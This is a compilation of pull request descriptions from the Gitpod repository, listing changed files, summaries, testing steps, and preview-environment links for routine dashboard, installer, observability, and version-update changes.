> Scope config lookup to org

- components/dashboard/src/user-settings/Integrations.tsx
Fixes an issue where if you hit <kbd>Manage on ...</kbd>, you will be led to a 404, because we treat, what should be treated as an absolute URL, as a relative one. 
Fixes EXP-1048
1. Open the preview env
2. Go to user settings -> integrations
3. Click on the overflow menu on any GitHub / GitLab provider and choose <kbd>Manage on ...</kbd>. A tab should open with the SCM to update your scopes.
<ul>
<li><b>🏷️ Name</b> - ft-fix-rel3f04fb431f</li>
<li><b>🔗 URL</b> - <a href="https://ft-fix-rel3f04fb431f.preview.gitpod-dev.com/workspaces" target="_blank">ft-fix-rel3f04fb431f.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📚 Documentation</b> - See our <a href="https://www.notion.so/gitpod/6debd359591b43688b52f76329d04010#7c …
> Fix relative URLs on the Integrations page

- dev/preview/workflow/preview/deploy-gitpod.sh
Revert preview env workspace classes changes (forget to do it in previous PR)
Fixes [internal chat](https://gitpod.slack.com/archives/C05H5UQBW6Q/p1702566902574889?thread_ts=1702545611.036749&cid=C05H5UQBW6Q)
Check content of `deploy-gitpod.sh` file before https://github.com/gitpod-io/gitpod/pull/19191
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
Saves cost. Untick this …
> Revert preview env workspace classes changes

- components/gitpod-db/src/typeorm/migration/1701725025283-AddOrgSettingWorkspaceClass.ts
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> [gitpod-db] AddOrgSettingWorkspaceClass1701725025283

- components/dashboard/src/components/SelectWorkspaceClassComponent.tsx
- components/dashboard/src/components/forms/CheckboxInputField.tsx
- components/dashboard/src/components/podkit/switch/Switch.tsx
- components/dashboard/src/data/featureflag-query.ts
- components/dashboard/src/data/organizations/org-workspace-classes-query.ts
- components/dashboard/src/data/organizations/update-org-settings-mutation.ts
- components/dashboard/src/data/setup.tsx
- components/dashboard/src/repositories/detail/ConfigurationDetailPrebuilds.tsx
- components/dashboard/src/teams/TeamSettings.tsx
- components/dashboard/src/workspaces/CreateWorkspacePage.tsx
- Blocked by https://github.com/gitpod-io/gitpod/pull/19275
Addition changes are in Fixing commit https://github.com/gitpod-io/gitpod/pull/19276/commits/ec299ea181627163abe76065f22a60895d34244e
Fixes Project Setting page crash [[internal chat](https://gitpod.slack.com/archives/C06B030LCL8/p1702640968561529)]
https://hw-revert-d5978ec121.preview.gitpod-dev.com/settings
- It should be able to access Project Setting page
- It should select default workspace class in new workspace page
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> Revert and fixing "Revert "Add org-level workspace class restrictions"" - Dashboard

- components/content-service/pkg/initializer/git.go
Removing because it's causing integration tests to fail.
It's causing integration tests to fail here: https://github.com/gitpod-io/gitpod/blob/c4e2c43ab1acb78fda438be135b4d2bf3ec661df/test/tests/components/ws-manager/prebuild_test.go#L684
Fixes n/a
[TestOpenWorkspaceFromPrebuild is passing now](https://github.com/gitpod-io/gitpod/actions/runs/7223943576/job/19684479806#step:6:789). The run [failed](https://github.com/gitpod-io/gitpod/actions/runs/7223943576/job/19684479806#step:6:1474) due to a flake.
gitpod:summary
<details>
</details>
<details>
</details>
<details> …
> [content-service] revert git config feature.manyFiles true

- components/dashboard/src/user-settings/PersonalAccessTokensCreateView.tsx
- dev/preview/workflow/preview/deploy-gitpod.sh
Instead of forcing users to check a box for all scopes on an otherwise unusable token, warn the users about the permissions of the token.
Fixes EXP-948
Make sure that newly created PAT tokens still work. Create a new one in the user preferences and all resources should be accessible by it by default. You can also use it to log in to the CLI
```bash
curl 'https://api.ft-access-e3aa0c98b9.preview.gitpod-dev.com/gitpod.experimental.v1.WorkspacesService/ListWorkspaces' \
-H 'content-type: application/json' \
-H 'Authorization: Bearer your_token \
--data '{}'
```
<ul>
<li><b>🏷️ Name</b> - ft-access-e3aa0c98b9</li>
<li><b>🔗 URL</b> - <a href="https://ft-access-e3aa0c98b9.preview.gitpod-dev.com/workspaces" …
> Remove Access Token scope checkbox

- install/installer/pkg/components/workspace/ide/constants.go
Fixes #
- Switch to VS Code Browser stable in settings.
<ul>
<li><b>🏷️ Name</b> - jp-assistant-hamster</li>
<li><b>🔗 URL</b> - <a href="https://jp-assistant-hamster.preview.gitpod-dev.com/workspaces" target="_blank">jp-assistant-hamster.preview.gitpod-dev.com/workspaces</a>.</li> …
> [code] Update code to 1.85.1

- components/server/src/auth/auth-provider-service.spec.db.ts
- components/server/src/auth/bearer-authenticator.spec.db.ts
- components/server/src/authorization/authorizer.spec.db.ts
- components/server/src/authorization/caching-spicedb-authorizer.spec.db.ts
- components/server/src/authorization/relationship-updater.spec.db.ts
- components/server/src/orgs/organization-service.spec.db.ts
- components/server/src/orgs/organization-service.spec.ts
- components/server/src/orgs/organization-service.ts
- components/server/src/orgs/usage-service.spec.db.ts
- components/server/src/projects/projects-service.spec.db.ts
- components/server/src/scm/scm-service.spec.db.ts
- components/server/src/session-handler.spec.db.ts
- components/server/src/user/env-var-service.spec.db.ts
- components/server/src/user/gitpod-token-service.spec.db.ts
- components/server/src/user/sshkey-service.spec.db.ts
- components/server/src/user/user-service.spec.db.ts
- components/server/src/workspace/context-service.spec.db.ts
- components/server/src/workspace/workspace-service.spec.db.ts
Fixes [internal chat](https://gitpod.slack.com/archives/C05H5UQBW6Q/p1702917379651279)
- Exec `cd components/server && yarn build && yarn test:unit` should work and pass
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [server] fix unit test

- components/supervisor/openssh/leeway.Dockerfile
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> Update openssh to v9.6-P1

- install/installer/pkg/config/versions/versions.go
Fixes an NG image pull error caused by the installer
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> [installer] Add ws-daemon-ng to version manifests

- operations/observability/mixins/workspace/rules/central/workspaces.yaml
This alert fired 8 times for us107 since Dec 23, each time the operator followed the run book, but, no action was required. Let's make it more difficult for the alert to fire, to avoid unnecessary escalations to on-call.
Fixes n/a
[Compare](https://grafana.gitpod.io/explore?panes=%7B%22Mkx%22:%7B%22datasource%22:%22P4169E866C3094E38%22,%22queries%22:%5B%7B%22refId%22:%22A%22,%22expr%22:%22sum%20by%28cluster%29%28gitpod_ws_manager_mk2_workspace_phase_total%7Btype%3D%5C%22Regular%5C%22,%20phase%3D%5C%22Stopping%5C%22,%20cluster%21~%5C%22ephemeral.%2A%5C%22%7D%29%20%2F%20sum%20by%28cluster%29%20%28gitpod_ws_manager_mk2_workspace_phase_total%7Btype%3D%5C%22Regular%5C%22,%20cluster%21~%5C%22ephemeral.%2A%5C%22%7D%29%20%3E%20.2%5Cr%5Cnand%5Cr%5Cn%20sum%20by%28cluster%29%28%5Cr%5Cn%20%20%20%20%20 …
> [obs] tune GitpodWorkspaceStuckOnStoppingMk2 alert

- components/gitpod-db/go/cost_center.go
- components/gitpod-db/go/cost_center_test.go
- components/gitpod-db/src/typeorm/migration/1704350022475-TrackEmailForFreeCredits.ts
- components/gitpod-protocol/go/gitpod-config-types.go
adds email tracking to free allowance
Fixes EXP-1078
<ul>
<li><b>🏷️ Name</b> - se-trackemail</li>
<li><b>🔗 URL</b> - <a href="https://se-trackemail.preview.gitpod-dev.com/workspaces" target="_blank">se-trackemail.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - se-trackemail-gha.22114</li>
<li><b>🗒️ Logs</b> - <a href="https://console.cloud.google.com/logs/query;query=jsonPayload.kubernetes.host%3D%22preview-se-trackemail%22%0A%0A--%20Filter%20on%20serv …
> [usage] track email for free allowance

- components/local-app/CHANGELOG.md
- components/local-app/cmd/organization-get.go
Previously, you would have to provide an organization ID for the `gitpod org get` command, which was quite impractical. With this change, the ID is inferred from the active context.
Fixes EXP-1074
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> Make `gitpod org get` use the context's org by default

- .github/workflows/workspace-integration-tests.yml
Fixes scheduled integration test runs
`--workflow Build` was failing as there's two workflows with that name, now reference the exact workflow by file name
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> Fix integration tests workflow run list

- components/dashboard/src/components/podkit/buttons/Button.tsx
- components/dashboard/src/workspaces/EmptyWorkspacesContent.tsx
- components/dashboard/src/workspaces/WorkspacesSearchBar.tsx
Fixes gap between button children on the New Workspace button
| Before | Now |
| <img width="543" alt="image" src="https://github.com/gitpod-io/gitpod/assets/29888641/d84487e0-ab8b-4bef-b13c-7c66c823273b"> |<img width="543" alt="image" src="https://github.com/gitpod-io/gitpod/assets/29888641/01279bb2-be4e-4fc4-a339-f302d1385b66"> | 
Fixes a [Slack-raised issue](https://gitpod.slack.com/archives/C065C7LC328/p1704455880714019).
<ul>
<li><b>🏷️ Name</b> - ft-button-gap-fix</li>
<li><b>🔗 URL</b> - <a href="https://ft-button-gap-fix.preview.gitpod-dev.com/workspaces" target="_blank">ft-button-gap-fix.preview.gitpod-dev.com/workspaces</a>.</li> …
> Fix button gap

- components/dashboard/src/components/TabMenuItem.tsx
**Before:**
https://github.com/gitpod-io/gitpod/assets/55068936/8dabbea9-06d7-48e4-80c8-482c78e3f38e
**After:**
https://github.com/gitpod-io/gitpod/assets/55068936/1996ac29-2c9c-4e68-a87e-e306f0903514
Fixes EXP-1108
<ul>
<li><b>🏷️ Name</b> - siddhant-efd585fc0b0</li>
<li><b>🔗 URL</b> - <a href="https://siddhant-efd585fc0b0.preview.gitpod-dev.com/workspaces" target="_blank">siddhant-efd585fc0b0.preview.gitpod-dev.com/workspaces</a>.</li> …
> [UX] Refactor Tab menu styles to highlight active state

- components/server/src/auth/auth-provider-service.spec.db.ts
- components/server/src/orgs/organization-service.spec.db.ts
- components/server/src/orgs/usage-service.spec.db.ts
- components/server/src/projects/projects-service.spec.db.ts
- components/server/src/user/env-var-service.spec.db.ts
- components/server/src/user/gitpod-token-service.spec.db.ts
- components/server/src/user/sshkey-service.spec.db.ts
- components/server/src/user/user-service.spec.db.ts
- components/server/src/workspace/context-service.spec.db.ts
- components/server/src/workspace/workspace-service.spec.db.ts
Fix db test cases
Fixes #
Open this PR with Gitpod
```
cd components/server
yarn build && yarn test:db
```
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
Valid options are `all`, `workspace`, `webapp`, `ide`, `jetbrains`, `vscode`, `ssh`. If enabled, `with-preview` and `with-large-vm` …
> [server] fix db tests with test ctx wrap

- dev/gpctl/cmd/users-block.go
- dev/gpctl/cmd/users-unblock.go
- dev/gpctl/cmd/users.go
To help automate unblocking users
Fixes n/a
Got a preview environment created with `leeway run dev:preview`.
Made myself an admin via `leeway run components:make-user-admin`
Got an access token, and ran the below tests from a workspace in the preview environment from this branch:
```bash
go run . users block --token $TOKEN --address wss://kylos101-u73aa6162e2.preview.gitpod-dev.com/api/v1 f66c4875-42d9-4a51-955e-b80b788cdfcc
go run . users unblock --token $TOKEN --address wss://kylos101-u73aa6162e2.preview.gitpod-dev.com/api/v1 f66c4875-42d9-4a51-955e-b80b788cdfcc
```
gitpod:summary
<details>
</details>
<details>
</details>
<details>
Add …
> [gpctl] add `users unblock` command

- components/dashboard/src/service/service.tsx
- components/supervisor/frontend/src/index.ts
- components/supervisor/frontend/src/shared/frontend-dashboard-service.ts
- components/supervisor/frontend/src/shared/index.css
- components/supervisor/frontend/src/shared/loading-frame.ts
<ul>
<li><b>🏷️ Name</b> - revert-193adcb124071</li>
<li><b>🔗 URL</b> - <a href="https://revert-193adcb124071.preview.gitpod-dev.com/workspaces" target="_blank">revert-193adcb124071.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - revert-19314-jp-relaxed-canidae-gha.22280</li>
<li><b>🗒️ Logs</b> - <a href="https://console.cloud.google.com/logs/query;query=jsonPayload.kubernetes.host%3D%22preview-revert-193adcb124071%22%0A%0A--%20Filter%20on%20service:%0A …
> Revert "Redirect on workspace stop"

- operations/observability/mixins/meta/rules/dashboard.yaml
- operations/observability/mixins/meta/rules/server.yaml
Switch to use `unavailable`, because `unavailable` are more common metric for alerts and has been exported already. [more context](https://github.com/gitpod-io/gitpod-dedicated/pull/2673#discussion_r1447972971)
Fixes [EXP-1049](https://linear.app/gitpod/issue/EXP-1049)
Relates https://github.com/gitpod-io/gitpod-dedicated/pull/2726
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [observability] update dashboard not all ready alert

- components/dashboard/src/user-settings/Integrations.tsx
Bug got introduced in #19057 (cc: @AlexTugarev), which confuses the `appRedirectUrl` with GitHub App settings url (which is a constant URL for every user with GitHub App Id). See linked linear issue for more details.
Fixes EXP-1152
- Open preview environment & complete setup w/ GitHub as Git provider.
- Go to user integrations settings (`/user/integrations`) and click on three dots in `GitHub` item list.
- Click on <kbd>Manage on github.com</kbd> & see fixed URL.
<ul>
<li><b>🏷️ Name</b> - siddhant-e7c7afcfb57</li>
<li><b>🔗 URL</b> - <a href="https://siddhant-e7c7afcfb57.preview.gitpod-dev.com/workspaces" target="_blank">siddhant-e7c7afcfb57.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📚 Documentation</b> - See our …
> [dashboard] Fix GitHub app integration URL in user settings

- install/installer/pkg/components/workspace/ide/constants.go
Update code web extension https://github.com/gitpod-io/gitpod-code/pull/16
Fixes https://linear.app/gitpod/issue/EXP-1086
1. Open a workspace in vscode web
2. Check there following commands are not present 
- Gitpod: Open Community Chat
- Gitpod: Follow us on Twitter
- Gitpod: Report Issue
- Gitpod: Upgrade Subscription
<ul>
<li><b>🏷️ Name</b> - jp-appropr597d433063</li>
<li><b>🔗 URL</b> - <a href="https://jp-appropr597d433063.preview.gitpod-dev.com/workspaces" target="_blank">jp-appropr597d433063.preview.gitpod-dev.com/workspaces</a>.</li> …
> Update code web extension

- components/gitpod-db/src/typeorm/migration/1705591447620-AdminUserAddAdminRole.ts
Part of https://github.com/gitpod-io/gitpod/pull/19324
Fixes #
Should test in https://github.com/gitpod-io/gitpod/pull/19324
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> Add admin role to builtin admin back

- components/server/src/bitbucket-server/bitbucket-server-api.ts
- components/server/src/bitbucket-server/bitbucket-server-repository-provider.ts
Changes are based on:
- Field `latest-commit-metadata` will be undefined for some reason (base on information provided on issue EXP-1058). [[code refer](https://github.com/gitpod-io/gitpod/blob/903fc68587a70f4496a8e4c17a5404d8b0c7ccae/components/server/src/bitbucket-server/bitbucket-server-api.ts#L288-L289)] is not safe on Typescript that meta could be undefined 
- We only need `name` and `htmlUrl` field for prebuild trigger
- We can confirm that respond data must have fields without search params `details=true`, so we can make data based on it
- https://bitbucket.gitpod-dev.com/rest/api/1.0/projects/MOR/repos/bb-extension-test/branches?details=true
- https://bitbucket.gitpod-dev.com/rest/api/1.0/projects/MOR/repos/bb-extension-test/branches
Fixes EXP-1058
No way to test. Review the code, …
> [server] fix BBS metadata `latest-commit-metadata` not defined cause prebuild trigger failed

- install/installer/pkg/components/spicedb/deployment.go
spicedb pipe all logs into stderr, this PR updates log level of spicedb to `error` to avoid error reporting
Fixes EXP-1198
Should have no `info` logs in spicedb
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [installer] update log level of spicedb

- components/dashboard/src/user-settings/Integrations.tsx
This PR fixes the integration settings URL and improves the copy functionality in the GitI Integration Modal component. Aligned the Copy input component to the modal and performs code cleanup.
Fixes EXP-1182
- Open preview environment
- Go to user settings
- Go to `Git providers` and Click <kbd>New Integration</kbd>
<ul>
<li><b>🏷️ Name</b> - siddhant-edde7213363</li>
<li><b>🔗 URL</b> - <a href="https://siddhant-edde7213363.preview.gitpod-dev.com/workspaces" target="_blank">siddhant-edde7213363.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📚 Documentation</b> - See our <a href="https://www.notion.so/gitpod/6debd359591b43688b52f76329d04010#7c1ce80ab31a41e29eff2735e38eec39" target="_blank">internal documentation</a> …
> Fix & Refactor Git Integration settings modal

- components/server/src/api/server.ts
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> [papi] log ctx time if request took too much time

- components/public-api/typescript-common/src/public-api-converter.ts
When server throw Unimplemented ApplicationError, gRPC clients will receive gRPC code `Unknown`. This PR is about to improve it
Fixes #
https://hw-papi-unimplement.preview.gitpod-dev.com/workspaces
Generate PAT token in preview env and use it in https://github.com/mustard-mh/test/tree/gp/papi-example error message should include `unimplemented`
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [papi] better grpc code for application unimplemented

- components/dashboard/src/user-settings/TokenEntry.tsx
change gap between icon to description to `8px`
Fixes [internal chat](https://gitpod.slack.com/archives/C05H5UQBW6Q/p1706112416774419?thread_ts=1705433151.541559&cid=C05H5UQBW6Q)
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [dashboard] ux improvement on pat list

- install/installer/pkg/components/openvsx-proxy/statefulset.go
- install/installer/pkg/config/v1/experimental/experimental.go
This PR updates the openvsx-proxy environment variable to have extra proxy settings if the cell is using a proxy
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [openvsx-proxy] Pass in proxy settings as env vars

- install/installer/pkg/components/openvsx-proxy/statefulset.go
I did a copy pasting blunder and introduced a bug. This PR fixes the value being passed on to the env var `NO_PROXY`
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [installer] Fix wrong env var name for proxy settings

- install/installer/pkg/components/openvsx-proxy/statefulset.go
I tried to use the experimental config directly without using using `WithExperiment` method. Currently the installer doesn't add the proxy settings to openvsx-proxy. With this change it, it is working fine.
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [installer] Use experimental config properly for openvsx-proxy

- install/installer/pkg/components/registry-facade/daemonset.go
This is a a change needed to access registries in internal network if a proxy is being used.
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [installer] Adding proxy setting env vars to registry facade

- install/installer/pkg/components/registry-facade/daemonset.go
Currently installer is panicking in the cases where this `webApp` field is unset.
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [installer] Check if experimental config is nil

- components/dashboard/src/AppNotifications.tsx
Since https://github.com/gitpod-io/gitpod/pull/19349 (at least w.r.t the timeline) we're seeing a higher jsonrpc error rate on Dedicated cells.
This PR disables API calls not relevant for Dedicated:
Fixes #
* API calls expected to succeed in gitpodio-like deployments
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
Saves cost. Untick this only if you're really sure you need …
> [dashboard] check billing address on gitpodio only

- components/ide-service/pkg/server/server.go
- install/installer/pkg/components/ide-service/ide_config_configmap.go
- install/installer/pkg/components/workspace/ide/constants.go
- Enable vscode 1.85 for older linux distros
- Update stable vscode to 1.86
Fixes https://linear.app/gitpod/issue/EXP-1315
- Preview env https://jp-reasonable-skink.preview.gitpod-dev.com/workspaces
- Flag https://app.configcat.com/08da1258-64fb-4a8e-8a1e-51de773884f6/08da1258-6541-4fc7-8b61-c8b47f82f3a0/08da1258-6512-4ec0-80a3-3f6aa301f853
- Check vscode 1.85 is shown in ide list and workspace can be started
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> Enable vscode 1.85 for older linux distros

- install/installer/pkg/config/v1/experimental/experimental.go
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> Add a note about no proxy env var

- install/installer/pkg/components/registry-facade/daemonset.go
Remove the registry-facade support for proxy settings temporarily
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> [registry-facade] Remove support for proxy settings

- components/image-builder-bob/leeway.Dockerfile
- dev/preview/infrastructure/scripts/bootstrap-k3s.sh
Update to our latest buildkit [fork](https://github.com/gitpod-io/buildkit/pull/1), which is on v0.12.5.
Fixes ENG-1639
Using this test repo: https://github.com/kylos101/gitpod-custom-image
1. Do an image build from this preview environment and start a workspace:
* ![image](https://github.com/gitpod-io/gitpod/assets/1272076/354dabcf-fe23-4d9e-b34c-e2d429b8aae4)
2. Do the same image build from a Gitpod workspace in this preview environment using `gp validate` and open the debug workspace
* ![image](https://github.com/gitpod-io/gitpod/assets/1272076/204f9878-e553-4ba2-aeec-7216465f117f)
<ul>
<li><b>🏷️ Name</b> - kylos101-g330ce40b86</li>
<li><b>🔗 URL</b> - <a href="https://kylos101-g330ce40b86.preview.gitpod-dev.com/workspa …
> [image-builder-bob] update buildkit version

- install/installer/pkg/components/redis/deployment.go
`nc` got removed from the chainguard redis image
Fixes ENG-1677
Tested by manually running the readiness probe in the latest redis image, with and without a redis running in the background, and checking the exit status code.
Redis also becomes ready in preview env:
<ul>
<li><b>🏷️ Name</b> - wv-fix-red8d54c06ad1</li>
<li><b>🔗 URL</b> - <a href="https://wv-fix-red8d54c06ad1.preview.gitpod-dev.com/workspaces" target="_blank">wv-fix-red8d54c06ad1.preview.gitpod-dev.com/workspaces</a>.</li> …
> [redis] Fix readiness probe

- dev/preview/infrastructure/modules/gce/cloudinit.yaml
- dev/preview/infrastructure/modules/gce/variables.tf
- dev/preview/infrastructure/modules/harvester/variables.tf
- dev/preview/infrastructure/scripts/bootstrap-k3s.sh
- dev/preview/infrastructure/variables.tf
Update to the latest image. 
Fixes ENG-1668
Start a workspace in preview:
<ul>
<li><b>🏷️ Name</b> - kylos101-gd9f4c157e2</li>
<li><b>🔗 URL</b> - <a href="https://kylos101-gd9f4c157e2.preview.gitpod-dev.com/workspaces" target="_blank">kylos101-gd9f4c157e2.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - kylos101-gen108-preview-gha.22896</li>
<li><b>🗒️ Logs</b> - <a href="https://console.cloud.google.com/logs/query;query=jsonPayload.kubernetes.host%3D%22p …
> [preview] update to gen108 VM image

- components/dashboard/src/projects/Prebuild.tsx
This PR introduces to avoid the direct workspace creation based on prebuilds. This change addresses a critical issue where workspaces could previously be initiated based on outdated git information, leading to potential discrepancies and sync issues with the latest repository state.
Fixes EXP-1072
- Go to `Projects` tab
- Add a project, Enable prebuilds
- Open project's prebuilds & Hit prebuild
- Open prebuild page of that repo. and see `New workspace (from this prebuild)` is not there anymore 👀 
<ul>
<li><b>🏷️ Name</b> - siddhant-e7a3f8f68b9</li>
<li><b>🔗 URL</b> - <a href="https://siddhant-e7a3f8f68b9.preview.gitpod-dev.com/workspaces" target="_blank">siddhant-e7a3f8f68b9.preview.gitpod-dev.com/workspaces</a>.</li> …
> Disable Workspace creation directly from prebuilds

- install/installer/pkg/components/workspace/ide/constants.go
- Hides `Gitpod: documentation` command
Fixes https://linear.app/gitpod/issue/EXP-1348/
Preview env: https://jp-awful-carp.preview.gitpod-dev.com/workspaces
- Check `Gitpod: documentation` command is not shown in menu and command palette
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [code] Update code-web extension image

- components/dashboard/src/Login.tsx
- components/dashboard/src/components/podkit/buttons/Button.tsx
- components/dashboard/src/workspaces/CreateWorkspacePage.tsx
Fix the new workspace modal button to be aligned properly. 
A regression introduced in https://github.com/gitpod-io/gitpod/pull/19361/commits/241ed478d2bb46d1afde56e10f5f4da8c8a6dade
<ul>
<li><b>🏷️ Name</b> - ft-fix-new-ws-btn</li>
<li><b>🔗 URL</b> - <a href="https://ft-fix-new-ws-btn.preview.gitpod-dev.com/workspaces" target="_blank">ft-fix-new-ws-btn.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - ft-fix-new-ws-btn-gha.22939</li>
<li><b>🗒️ Logs</b> …
> Fix start workspace button alignment

- components/dashboard/src/data/configurations/configuration-queries.ts
- components/dashboard/src/data/featureflag-query.ts
- components/dashboard/src/data/prebuilds/prebuild-query.ts
- components/dashboard/src/menu/OrganizationSelector.tsx
- components/dashboard/src/prebuilds/list/PrebuildListItem.tsx
- components/dashboard/src/projects/prebuild-utils.tsx
- components/dashboard/src/repositories/detail/prebuilds/PrebuildDetailPage.tsx
- components/dashboard/src/repositories/list/RepoListItem.tsx
Fixes some small issues with prebuilds and configs:
- in lists, fix layouts where the configuration name is super long 
- fixed prebuild status icons to be consistent and similar to the rest
Fixes #
<ul>
<li><b>🏷️ Name</b> - ft-repo-pr16276b329d</li>
<li><b>🔗 URL</b> - <a href="https://ft-repo-pr16276b329d.preview.gitpod-dev.com/workspaces" target="_blank">ft-repo-pr16276b329d.preview.gitpod-dev.com/workspaces</a>.</li> …
> Misc UI fixes for configs and prebuilds

- components/dashboard/src/user-settings/Preferences.tsx
- components/server/src/workspace/workspace-starter.ts
This pull request fixes a bug related to workspace timeout. Previously, when updating the workspace timeout setting, the `disabledClosedTimeout` flag was not being set correctly. This caused the workspace to be automatically stopped or terminated due to inactivity, even if the user had explicitly disabled this feature. This pull request ensures that the `disabledClosedTimeout` flag is set correctly when updating the workspace timeout setting, allowing users to have greater control over their workspace's lifecycle.
Fixes EXP-1343
- Create account in preview environment
- Complete billing with mock stripe a/c
- Setup timeout in user settings (let's say 15m)
- create a workspace from any repo in VS Code browser or VS Code desktop
- Now, close the workspace tab (if VS code browser) or VS Code …
> fix: Workspace Timeout Bug: Correctly Apply disabledClosedTimeout Flag for Enhanced User Control

- install/installer/pkg/components/workspace/ide/constants.go
Update code-web extension
https://github.com/gitpod-io/gitpod-code/commit/4e069a6195f3926ba8b84725bc806228f4cb94ec
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> Update code-web extension

- components/dashboard/src/AppNotifications.tsx
This pull request fixes a regression issue where hitting the stripe API rate limit would result in an error. The issue has been resolved by removing the unnecessary `stripePortalUrl` state and updating the code accordingly.
regression but introduced in #19417
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
Saves cost. Untick this only if you're really sure you need a …
> Fix stripe API rate limit error

- components/ide/jetbrains/gateway-plugin/gradle-stable.properties
This PR updates the Platform Version from JetBrains Gateway Plugin (Stable) to the latest version.
<details>
- You should use Gateway version corresponding to plugin qualifier, i.e. for stable plugin test with released, for latest test with EAP.
- It could be that a new Gateway is not published for the given SDK yet then wait for it to be published. You can check the build version in the About dialog.
2. Download the plugin build related to this branch in [Dev …
> Update Platform Version of JetBrains Gateway Plugin (Stable)

- components/ide/jetbrains/gateway-plugin/gradle-latest.properties
This PR updates the Platform Version from JetBrains Gateway Plugin (EAP) to the latest version.
<details>
- You should use Gateway version corresponding to plugin qualifier, i.e. for stable plugin test with released, for latest test with EAP.
- It could be that a new Gateway is not published for the given SDK yet then wait for it to be published. You can check the build version in the About dialog.
2. Download the plugin build related to this branch in [Dev Versions](https://plugins.jetbrains.com/plugin/18438-gitpod-g …
> Update Platform Version of JetBrains Gateway Plugin (EAP)

- components/usage/pkg/stripe/stripe.go
This pull request fixes an issue with the stripe service where the address parameters were not being set correctly. The `SetDefaultPaymentForCustomer` function now includes all the necessary address fields such as Line1, Line2, City, PostalCode, Country, and State. This ensures that the customer's address is properly updated when setting the default payment method.
Fixes EXP-1359
<ul>
<li><b>🏷️ Name</b> - fix-stripe-ip-bug</li>
<li><b>🔗 URL</b> - <a href="https://fix-stripe-ip-bug.preview.gitpod-dev.com/workspaces" target="_blank">fix-stripe-ip-bug.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📚 Documentation</b> - See our <a href="https://www.notion.so/gitpod/6debd359591b43688b52f76329d04010#7c1ce80ab31a41e29eff2735 …
> [billing] fix: stripe service for their address parameters

- WORKSPACE.yaml
- install/installer/pkg/components/workspace/ide/constants.go
Update code 1.86.2
<ul>
<li><b>🏷️ Name</b> - jp-collective-otter</li>
<li><b>🔗 URL</b> - <a href="https://jp-collective-otter.preview.gitpod-dev.com/workspaces" target="_blank">jp-collective-otter.preview.gitpod-dev.com/workspaces</a>.</li> …
> [code] Update code 1.86.2

- operations/observability/mixins/workspace/rules/satellite/workspaces.yaml
GitpodWorkspaceTooManyRegularNotActiveMk2 still triggers too often (false positive): it wakes on-callers up at night, and vanishes after ~2mins, without anybody having a chance to do anything.
Before we had a lower bound of 50 workspaces in a cluster (`sum(gitpod_ws_manager_mk2_workspace_activity_total) by(cluster) > 50`). That was still way to low, because there all sorts of reasons why a handful of workspaces are suddenly appearing in the "regular not active" bucket.
This change alters this lower bound to "at least 20 workspaces regular-not-active stuck for 10 mins", because we don't want to wake up on-call for for individual workspaces.
Related: EXP-1392
gitpod:summary
<details>
</details> …
> GitpodWorkspaceTooManyRegularNotActiveMk2: add lower bound of 20

- install/installer/pkg/components/redis/deployment.go
Use TCP probe instead of timeout command, to prevent leaking processes
Fixes #
See preview env `wv-redis-probe-tcp`, redis container comes up as Ready
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [redis] Use TCP probe

- .github/workflows/lacework-inline-scanner.yml
- scripts/lw-scan-images.sh
This change uses the `installer mirror list` command to get the list of all used images for the Lacework scan. It also fixes the issues that lacework cannot scan images from Docker Hub. For some reason, removing the `docker.io/` prefix did the trick.
As an additional improvement, it does not stop scanning when there is an error with an image. It continues and returns an error exit code at the end.
Fixes https://linear.app/gitpod/issue/ENG-1591/scan-workspace-images-for-cves
I started a manual GitHub action run: https://github.com/gitpod-io/gitpod/actions/runs/7805409193/job/21289613547
For some reason, the `xterm-web` image fails to scan:
```
= Scanning eu.gcr.io/gitpod-core-dev/build/ide/xterm-web : latest [49 / 66]
Pulling image: Done!
Saving image: Done!
Getting image manifest: Done! …
```
> [lacework] Use 'installer mirror list' and include Docker Hub images

- components/dashboard/src/components/WorkspaceLogs.tsx
